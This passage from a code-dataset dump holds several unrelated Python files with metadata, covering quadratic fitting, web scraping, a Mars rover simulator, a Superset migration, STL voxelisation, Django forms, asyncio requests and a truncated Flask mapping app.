quadratic(object):\n \"\"\"Class for fitting, evaluating, and interrogating quadratic functions\n\n This class is used for fitting a quadratic function to a data set\n evaluating the function at specific points, and determining the\n characteristics of the function.\n \"\"\"\n def __init__(self, x, y):\n \"\"\"\n Construct a quadratic object from tabulated data.\n Quadratic is of the form f(x) = ax^2 + bx + c\n\n Inputs\n ------\n x = List of independent values\n y = List of dependent values\n \"\"\"\n super().__init__()\n\n # Calculate the quadratic coefficients\n x_sq = [xx**2 for xx in x]\n A = np.vstack([x_sq, x, np.ones(len(x))]).T\n self.a, self.b, self.c = np.linalg.lstsq(A,y,rcond=None)[0]\n \n # Calculate the coefficient of determination\n f = [self.f(xx) for xx in x]\n ssres = ((f - y)**2).sum()\n sstot = ((y - y.mean())**2).sum()\n\n if abs(sstot) < 1e-14:\n # Data points actually formed a horizontal line\n self.rsq = 0.0\n else:\n self.rsq = 1 - ssres / sstot\n\n\n def convex(self):\n \"\"\"\n Test to see if the quadratic is convex (opens up).\n \"\"\"\n # Convex has positive curvature (2nd derivative)\n # f\"(x) = 2a, so a > 0 corresponds to convex\n return (self.a > 0)\n\n\n def vertex(self):\n \"\"\"\n Find the coordinates of the vertex\n \"\"\"\n if self.a != 0.0:\n # Find x where f'(x) = 2ax + b = 0\n x = -0.5 * self.b / self.a\n return (x, self.f(x))\n else:\n # Quadratic is actually a line, no minimum!\n return (None, None)\n\n\n def f(self, x):\n \"\"\"\n Evaluate the quadratic function at x\n \"\"\"\n if x is not None: return self.a * x**2 + self.b * x + self.c\n else: return None\n", "repo_name": "SauravLChaudhari/OptiX-Master-PhoeniX-", "sub_path": "classes.py", "file_name": "classes.py", "file_ext": "py", "file_size_in_byte": 7647, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.zeros", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 54, "usage_type": "attribute"}, {"api_name": "multiprocessing.Value", "line_number": 107, "usage_type": "call"}, {"api_name": "multiprocessing.Value", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.asscalar", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.asscalar", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.linalg.lstsq", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 209, "usage_type": "attribute"}]} +{"seq_id": "39949686612", "text": "# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass AspenSpider(scrapy.Spider):\n name = 'aspen'\n allowed_domains = ['www.aspen.com.uy/sitio/']\n start_urls = ['http://www.aspen.com.uy/sitio/']\n\n def parse(self, response):\n for divisa in response.css(\".md-divisas table tr.bd\"):\n yield {\n \"Name\":divisa.css(\".moneda.fixphone strong::text\").extract_first(),\n \"Compra\":divisa.css(\"td:nth-child(2)::text\").extract_first(),\n \"Venta\":divisa.css(\"td:nth-child(3)::text\").extract_first()\n }", "repo_name": "ylvaldes/ScrapingCambio", "sub_path": "scrapycambios/spiders/aspen.py", "file_name": "aspen.py", "file_ext": "py", "file_size_in_byte": 561, "program_lang": "python", "lang": "en", "doc_type": "code", 
"stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.Spider", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "43761777075", "text": "import sys\nfrom io import TextIOWrapper\nfrom typings import RoverPosition, Coordinate, PositionList, RoverMission\nfrom exceptions import BoundsError, CollisionError, CommandError\n\n\ncommand_translation = {\n \"N\": {\n \"L\": \"W\",\n \"R\": \"E\",\n \"M\": Coordinate(0, 1)\n },\n \"E\": {\n \"L\": \"N\",\n \"R\": \"S\",\n \"M\": Coordinate(1, 0)\n },\n \"S\": {\n \"L\": \"E\",\n \"R\": \"W\",\n \"M\": Coordinate(0, -1)\n },\n \"W\": {\n \"L\": \"S\",\n \"R\": \"N\",\n \"M\": Coordinate(-1, 0)\n },\n}\n\n\ndef execute_mission(\n plateau_bounds: Coordinate,\n rover_missions: list[RoverMission]\n) -> list[RoverPosition]:\n\n rover_positions = PositionList(\n [mission.starting_position for mission in rover_missions])\n\n for i, (_, command_sequence) in enumerate(rover_missions):\n for command in command_sequence.upper():\n rover_positions[i] = process_command(\n command,\n rover_positions[i],\n )\n\n check_position_validity(\n rover_positions[i],\n plateau_bounds,\n rover_positions\n )\n\n return rover_positions\n\n\ndef process_command(\n command: str,\n rover_position: RoverPosition\n) -> RoverPosition:\n\n if command in 'LR':\n return turn_rover(rover_position, side=command)\n\n if command == \"M\":\n return move_rover_forward(rover_position)\n\n raise CommandError(command)\n\n\ndef turn_rover(rover: RoverPosition, side: str) -> RoverPosition:\n return RoverPosition(\n rover.x,\n rover.y,\n command_translation[rover.direction][side]\n )\n\n\ndef move_rover_forward(rover: RoverPosition) -> RoverPosition:\n movement = command_translation[rover.direction][\"M\"]\n\n return RoverPosition(\n rover.x + movement.x,\n rover.y + movement.y,\n rover.direction\n )\n\n\ndef check_position_validity(\n rover: RoverPosition,\n plateau_bounds: Coordinate,\n rover_positions: PositionList\n) -> None:\n\n position = rover.get_coordinate()\n\n if rover_positions.has_collision(position):\n raise CollisionError(position)\n\n if not ((0 <= position.x <= plateau_bounds.x) and (0 <= position.y <= plateau_bounds.y)):\n raise BoundsError(position, plateau_bounds)\n\n\ndef extract_mission_data_from_file(file_handle: TextIOWrapper) -> tuple[Coordinate, list[RoverMission]]:\n try:\n x, y = file_handle.readline().strip().split()\n bounds = Coordinate(int(x), int(y))\n\n missions = []\n for i, line in enumerate(file_handle.readlines()):\n if i % 2 == 0:\n x, y, direction = line.strip().split()\n starting_position = RoverPosition(int(x), int(y), direction)\n else:\n command_sequence = line.strip()\n missions.append(RoverMission(\n starting_position, command_sequence))\n\n except:\n exit_with_error_message(\n f\"Mission data could not be correctly extracted from file. Isn't it encrypted?\")\n\n if ((bounds.x <= 0) or (bounds.y <= 0)):\n exit_with_error_message(\n f\"Malformed mission plateau data ({bounds.x}, {bounds.y}). Please measure the mission plateau again.\")\n\n if i % 2 == 0 or not missions:\n exit_with_error_message(\n \"Mission data is missing some line. 
Is the file complete?\")\n\n for starting_position, command_sequence in missions:\n if not (0 <= starting_position.x <= bounds.x and 0 <= starting_position.y <= bounds.y):\n exit_with_error_message(\n f\"Rover set to start out of the plateau at position {starting_position}\")\n\n if any(command not in \"LRM\" for command in command_sequence):\n exit_with_error_message(\n f\"Invalid command found in sequence '{command_sequence}'. Was the transmission noisy?\")\n\n return(bounds, missions)\n\n\ndef exit_with_error_message(message: str) -> None:\n print(message)\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n if(len(sys.argv) > 0):\n filename = sys.argv[1]\n else:\n filename = input(\"Write mission data file name: \")\n\n try:\n with open(filename, 'rt', encoding='utf-8') as mission_file:\n plateau_bounds, rover_missions = extract_mission_data_from_file(\n mission_file)\n\n mission_results = execute_mission(plateau_bounds, rover_missions)\n\n print(\"Rover final position(s):\")\n for rover_position in mission_results:\n print(rover_position)\n\n except FileNotFoundError:\n print(\n f\"Mission data file '{filename}' could not be found. Isn't it top secret?\")\n\n except (BoundsError, CollisionError, CommandError) as error:\n print(error.message)\n", "repo_name": "rlawisch/mars_rover", "sub_path": "mars_rover.py", "file_name": "mars_rover.py", "file_ext": "py", "file_size_in_byte": 4782, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typings.Coordinate", "line_number": 11, "usage_type": "call"}, {"api_name": "typings.Coordinate", "line_number": 16, "usage_type": "call"}, {"api_name": "typings.Coordinate", "line_number": 21, "usage_type": "call"}, {"api_name": "typings.Coordinate", "line_number": 26, "usage_type": "call"}, {"api_name": "typings.Coordinate", "line_number": 32, "usage_type": "name"}, {"api_name": "typings.RoverMission", "line_number": 33, "usage_type": "name"}, {"api_name": "typings.PositionList", "line_number": 36, "usage_type": "call"}, {"api_name": "typings.RoverPosition", "line_number": 34, "usage_type": "name"}, {"api_name": "typings.RoverPosition", "line_number": 57, "usage_type": "name"}, {"api_name": "exceptions.CommandError", "line_number": 66, "usage_type": "call"}, {"api_name": "typings.RoverPosition", "line_number": 58, "usage_type": "name"}, {"api_name": "typings.RoverPosition", "line_number": 69, "usage_type": "name"}, {"api_name": "typings.RoverPosition", "line_number": 70, "usage_type": "call"}, {"api_name": "typings.RoverPosition", "line_number": 77, "usage_type": "name"}, {"api_name": "typings.RoverPosition", "line_number": 80, "usage_type": "call"}, {"api_name": "typings.RoverPosition", "line_number": 88, "usage_type": "name"}, {"api_name": "typings.Coordinate", "line_number": 89, "usage_type": "name"}, {"api_name": "typings.PositionList", "line_number": 90, "usage_type": "name"}, {"api_name": "exceptions.CollisionError", "line_number": 96, "usage_type": "call"}, {"api_name": "exceptions.BoundsError", "line_number": 99, "usage_type": "call"}, {"api_name": "io.TextIOWrapper", "line_number": 102, "usage_type": "name"}, {"api_name": "typings.Coordinate", "line_number": 105, "usage_type": "call"}, {"api_name": "typings.RoverPosition", "line_number": 111, "usage_type": "call"}, {"api_name": "typings.RoverMission", "line_number": 114, "usage_type": "call"}, {"api_name": "typings.Coordinate", "line_number": 102, "usage_type": "name"}, {"api_name": "typings.RoverMission", 
"line_number": 102, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 143, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 147, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 148, "usage_type": "attribute"}, {"api_name": "exceptions.BoundsError", "line_number": 167, "usage_type": "name"}, {"api_name": "exceptions.CollisionError", "line_number": 167, "usage_type": "name"}, {"api_name": "exceptions.CommandError", "line_number": 167, "usage_type": "name"}]} +{"seq_id": "25167154705", "text": "import sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nfrom superset import db\nfrom superset.utils.core import generic_find_fk_constraint_name\n\nrevision = \"3e1b21cd94a4\"\ndown_revision = \"6c7537a6004a\"\n\n\nsqlatable_user = sa.Table(\n \"sqlatable_user\",\n sa.MetaData(),\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"user_id\", sa.Integer, sa.ForeignKey(\"ab_user.id\")),\n sa.Column(\"table_id\", sa.Integer, sa.ForeignKey(\"tables.id\")),\n)\n\nSqlaTable = sa.Table(\n \"tables\",\n sa.MetaData(),\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"user_id\", sa.Integer, sa.ForeignKey(\"ab_user.id\")),\n)\n\ndruiddatasource_user = sa.Table(\n \"druiddatasource_user\",\n sa.MetaData(),\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"user_id\", sa.Integer, sa.ForeignKey(\"ab_user.id\")),\n sa.Column(\"datasource_id\", sa.Integer, sa.ForeignKey(\"datasources.id\")),\n)\n\nDruidDatasource = sa.Table(\n \"datasources\",\n sa.MetaData(),\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"user_id\", sa.Integer, sa.ForeignKey(\"ab_user.id\")),\n)\n\n\ndef upgrade():\n op.create_table(\n \"sqlatable_user\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"user_id\", sa.Integer(), nullable=True),\n sa.Column(\"table_id\", sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint([\"table_id\"], [\"tables.id\"]),\n sa.ForeignKeyConstraint([\"user_id\"], [\"ab_user.id\"]),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_table(\n \"druiddatasource_user\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"user_id\", sa.Integer(), nullable=True),\n sa.Column(\"datasource_id\", sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint([\"datasource_id\"], [\"datasources.id\"]),\n sa.ForeignKeyConstraint([\"user_id\"], [\"ab_user.id\"]),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n\n bind = op.get_bind()\n insp = sa.engine.reflection.Inspector.from_engine(bind)\n session = db.Session(bind=bind)\n\n tables = session.query(SqlaTable).all()\n for table in tables:\n if table.user_id is not None:\n session.execute(\n sqlatable_user.insert().values(user_id=table.user_id, table_id=table.id)\n )\n\n druiddatasources = session.query(DruidDatasource).all()\n for druiddatasource in druiddatasources:\n if druiddatasource.user_id is not None:\n session.execute(\n druiddatasource_user.insert().values(\n user_id=druiddatasource.user_id, datasource_id=druiddatasource.id\n )\n )\n\n session.close()\n with op.batch_alter_table(\"tables\") as batch_op:\n batch_op.drop_constraint(\"user_id\", type_=\"foreignkey\")\n batch_op.drop_column(\"user_id\")\n with op.batch_alter_table(\"datasources\") as batch_op:\n batch_op.drop_constraint(\n generic_find_fk_constraint_name(\"datasources\", {\"id\"}, \"ab_user\", insp),\n type_=\"foreignkey\",\n )\n batch_op.drop_column(\"user_id\")\n\n\ndef downgrade():\n op.drop_table(\"sqlatable_user\")\n 
op.drop_table(\"druiddatasource_user\")\n with op.batch_alter_table(\"tables\") as batch_op:\n batch_op.add_column(sa.Column(\"user_id\", sa.INTEGER(), nullable=True))\n batch_op.create_foreign_key(\"user_id\", \"ab_user\", [\"user_id\"], [\"id\"])\n with op.batch_alter_table(\"datasources\") as batch_op:\n batch_op.add_column(sa.Column(\"user_id\", sa.INTEGER(), nullable=True))\n batch_op.create_foreign_key(\n \"fk_datasources_user_id_ab_user\", \"ab_user\", [\"user_id\"], [\"id\"]\n )\n", "repo_name": "apache/superset", "sub_path": "superset/migrations/versions/2018-12-15_12-34_3e1b21cd94a4_change_owner_to_m2m_relation_on_.py", "file_name": "2018-12-15_12-34_3e1b21cd94a4_change_owner_to_m2m_relation_on_.py", "file_ext": "py", "file_size_in_byte": 3674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 55269, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlalchemy.Table", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 32, "usage_type": "attribute"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 37, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 38, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 39, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 39, "usage_type": "attribute"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 39, "usage_type": 
"call"}, {"api_name": "alembic.op.create_table", "line_number": 44, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 44, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 46, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 46, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 47, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 47, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 49, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 50, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 51, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 53, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 53, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 55, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 55, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 56, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 56, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 57, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 57, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 59, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 60, "usage_type": "call"}, {"api_name": "alembic.op.get_bind", "line_number": 63, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 63, "usage_type": "name"}, {"api_name": "sqlalchemy.engine.reflection.Inspector.from_engine", "line_number": 64, "usage_type": "call"}, {"api_name": "sqlalchemy.engine", "line_number": 64, "usage_type": "attribute"}, {"api_name": "superset.db.Session", "line_number": 65, "usage_type": "call"}, {"api_name": "superset.db", "line_number": 65, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 84, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 84, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 87, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 87, "usage_type": "name"}, {"api_name": "superset.utils.core.generic_find_fk_constraint_name", "line_number": 89, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 96, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 96, "usage_type": "name"}, {"api_name": "alembic.op.drop_table", "line_number": 97, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 97, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 98, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 98, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 99, "usage_type": "call"}, {"api_name": "sqlalchemy.INTEGER", "line_number": 99, "usage_type": "call"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 101, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 101, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.INTEGER", 
"line_number": 102, "usage_type": "call"}]} +{"seq_id": "26753189460", "text": "import stltovoxel\nimport numpy as np\nimport os\nimport cv2\nimport shutil\nimport tkinter as tk\nfrom tkinter import filedialog\n\n\ndef loadvoxel(path,resolution=20): \n input=path\n folder_path = os.path.dirname(path)+r\"/mainaktestingfolder\"\n os.mkdir(folder_path)\n output=folder_path+\"/output.png\"\n \n binary_array = np.zeros((resolution,resolution,resolution), dtype=bool)\n\n stltovoxel.convert_file(input, output, resolution-3)\n \n image_names = os.listdir(folder_path)[0:resolution]\n\n for i, name in enumerate(image_names):\n image = cv2.imread(os.path.join(folder_path, name), cv2.IMREAD_GRAYSCALE)\n image=cv2.resize(image,(resolution,resolution))\n binary_array[i,:,:] = (image > 0)\n # assume that white pixels represent \"true\"\n print(binary_array)\n shutil.rmtree(folder_path)\n return binary_array\n \n\ndef openSTL(vsize):\n root = tk.Tk()\n root.withdraw()\n file_path = filedialog.askopenfilename()\n print(file_path) \n if(file_path==\"\"):\n return None\n return loadvoxel(file_path,vsize)\n \n \ndef popup():\n def open_popup():\n popup = tk.Toplevel()\n popup.title(\"Error\")\n popup.geometry(\"200x100\")\n popup_label = tk.Label(popup, text=\"Are you sure you want to exit?\")\n popup_label.pack(padx=20, pady=20)\n root = tk.Tk()\n root.geometry(\"300x200\")\n popup_button = tk.Button(root, text=\"Open Popup\", command=open_popup)\n popup_button.pack(padx=20, pady=20)\n root.mainloop()\n \n\n \nif __name__ == '__main__':\n popup()\n #openSTL()", "repo_name": "Mainak-Deb/3dCAD", "sub_path": "objects/computation/loadvoxel.py", "file_name": "loadvoxel.py", "file_ext": "py", "file_size_in_byte": 1570, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "stltovoxel.convert_file", "line_number": 18, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 24, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 28, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 35, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 35, "usage_type": "name"}, {"api_name": "tkinter.Toplevel", "line_number": 44, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 49, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "71215411715", "text": "import html2text\nimport messages\nimport requests\n\nclass Feic:\n\n def __init__(self):\n\n self.messages = messages.messages\n\n def get_address_from_input(self):\n # the user input parsing goes here\n\n address = ''\n while (address == ''):\n\n 
print(self.messages['warning'])\n print('Enter \"quit\" to quit.')\n address = input('feicim URL > ')\n print(address)\n\n # parse any user commands\n if (address == 'quit' or address == 'exit' or address == '\"quit\"'):\n print(self.messages['oktnxbye'])\n exit()\n\n elif (address == 'show c'):\n print(self.messages['gpl3_conditions'])\n exit()\n\n elif (address == 'show w'):\n print(self.messages['gpl3_warranty'])\n exit()\n \n # add missing schema\n if (address[:8] != 'https://' and address[:7] != 'http://'):\n # default to https\n address = 'https://' + address\n\n return address\n\n\n def get_contents(self, address):\n # requests library \n # https://requests.readthedocs.io\n r = requests.get(address)\n\n return r.text\n\n\n def parse_content_to_md(self, content):\n # https://pypi.org/project/html2text/\n return html2text.html2text(content)\n\n\n def main(self):\n\n print(self.messages['greeting'])\n print(self.messages['description'])\n\n try:\n while True:\n\n print(self.parse_content_to_md(self.get_contents(self.get_address_from_input())))\n\n\n except KeyboardInterrupt:\n print(self.messages['oktnxbye'])\n\n\nif (__name__ == '__main__'):\n app = Feic()\n app.main()\n", "repo_name": "darrenkearney/feicit", "sub_path": "feic.py", "file_name": "feic.py", "file_ext": "py", "file_size_in_byte": 1770, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "messages.messages", "line_number": 9, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 46, "usage_type": "call"}, {"api_name": "html2text.html2text", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "30964758368", "text": "from .models import Restoran, Bluda\nfrom django.forms import ModelForm, TextInput, NumberInput, CharField, ModelChoiceField, ImageField, IntegerField, \\\n FloatField, Textarea\n\n\nclass RestoranForm(ModelForm):\n class Meta:\n model = Restoran\n fields=['nazvan', 'adres', 'telefon','content','foto']\n widgets={\n 'nazvan': TextInput(attrs={'class':'form-control', 'placeholder': 'Название ресторана'}),\n 'adres': TextInput(attrs={'class': 'form-control', 'placeholder': 'Адрес ресторана'}),\n 'telefon': NumberInput (attrs={'class': 'form-control', 'placeholder': 'Телефон в формате 80...', 'step':11 }),\n }\n\nclass BludaForm(ModelForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['kategor'].empty_label = \"Категория не выбрана\"\n class Meta:\n model = Bluda\n fields=['title', 'kategor', 'foto','full_text','masa','cena','name_restoran']\n\n widgets = {\n 'title': TextInput(attrs={'class':'form-input', 'placeholder': 'Название ресторана'}),\n 'full_text': Textarea(attrs={'cols': 170, 'rows':50, 'placeholder': 'Список продуктов'}),\n }\n\n", "repo_name": "JuliaLiachevich/Project_site", "sub_path": "proekt_site/restoran/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1270, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.forms.ModelForm", "line_number": 6, "usage_type": "name"}, {"api_name": "models.Restoran", "line_number": 8, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 11, "usage_type": "call"}, {"api_name": "django.forms.TextInput", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms.NumberInput", "line_number": 13, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 16, 
"usage_type": "name"}, {"api_name": "models.Bluda", "line_number": 21, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 25, "usage_type": "call"}, {"api_name": "django.forms.Textarea", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "7330547430", "text": "import asyncio\nimport aiohttp\n\nfrom util import async_timed\nfrom chapter_4 import fetch_status\n\n\n# async def fetch_status(\n# session: ClientSession,\n# url: str,\n# delay: int = 0\n# ) -> int:\n# await asyncio.sleep(delay)\n# async with session.get(url) as result:\n# return result.status\n\n\n@async_timed()\nasync def main():\n \"\"\"Использование as_completed, по мере выполнения.\"\"\"\n async with aiohttp.ClientSession() as session:\n fetchers = [\n fetch_status(session, 'https://ya.ru', 1),\n fetch_status(session, 'https://ya.ru', 1),\n fetch_status(session, 'https://ya.ru', 10)\n ]\n for finished_task in asyncio.as_completed(fetchers):\n print(await finished_task)\n\n# asyncio.run(main())\n\n# в windows нужно управлять циклом событий вручную\n# asyncio.get_event_loop().run_until_complete(main())\nasyncio.get_event_loop().run_until_complete(main())\n", "repo_name": "mrKrivedko/async_learning", "sub_path": "learning/chapter4/listing4.8.py", "file_name": "listing4.8.py", "file_ext": "py", "file_size_in_byte": 1008, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "aiohttp.ClientSession", "line_number": 21, "usage_type": "call"}, {"api_name": "chapter_4.fetch_status", "line_number": 23, "usage_type": "call"}, {"api_name": "chapter_4.fetch_status", "line_number": 24, "usage_type": "call"}, {"api_name": "chapter_4.fetch_status", "line_number": 25, "usage_type": "call"}, {"api_name": "asyncio.as_completed", "line_number": 27, "usage_type": "call"}, {"api_name": "util.async_timed", "line_number": 18, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "39943383879", "text": "from flask import Flask, request, session, g, redirect, \\\n url_for, abort, render_template, flash\n\nfrom geojson import Feature, Point\nfrom pyproj import Proj, transform\n\nimport requests, json, time\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\napp.config.from_envvar('APP_CONFIG_FILE', silent=True)\n\nMAPBOX_ACCESS_KEY = app.config['MAPBOX_ACCESS_KEY']\n\nROUTE = [\n {\"lat\": 64.0027441, \"long\": -22.7066262, \"name\": \"Keflavik Airport\", \"is_stop_location\": True},\n {\"lat\": 64.0317168, \"long\": -22.1092311, \"name\": \"Hafnarfjordur\", \"is_stop_location\": True},\n {\"lat\": 63.99879, \"long\": -21.18802, \"name\": \"Hveragerdi\", \"is_stop_location\": True},\n {\"lat\": 63.4194089, \"long\": -19.0184548, \"name\": \"Vik\", \"is_stop_location\": True},\n {\"lat\": 63.5302354, \"long\": -18.8904333, \"name\": \"Thakgil\", \"is_stop_location\": True},\n {\"lat\": 64.2538507, \"long\": -15.2222918, \"name\": \"Hofn\", \"is_stop_location\": True},\n {\"lat\": 64.913435, \"long\": -14.01951, \"is_stop_location\": False},\n {\"lat\": 65.2622588, \"long\": -14.0179538, \"name\": \"Seydisfjordur\", \"is_stop_location\": True},\n {\"lat\": 65.2640083, \"long\": -14.4037548, \"name\": 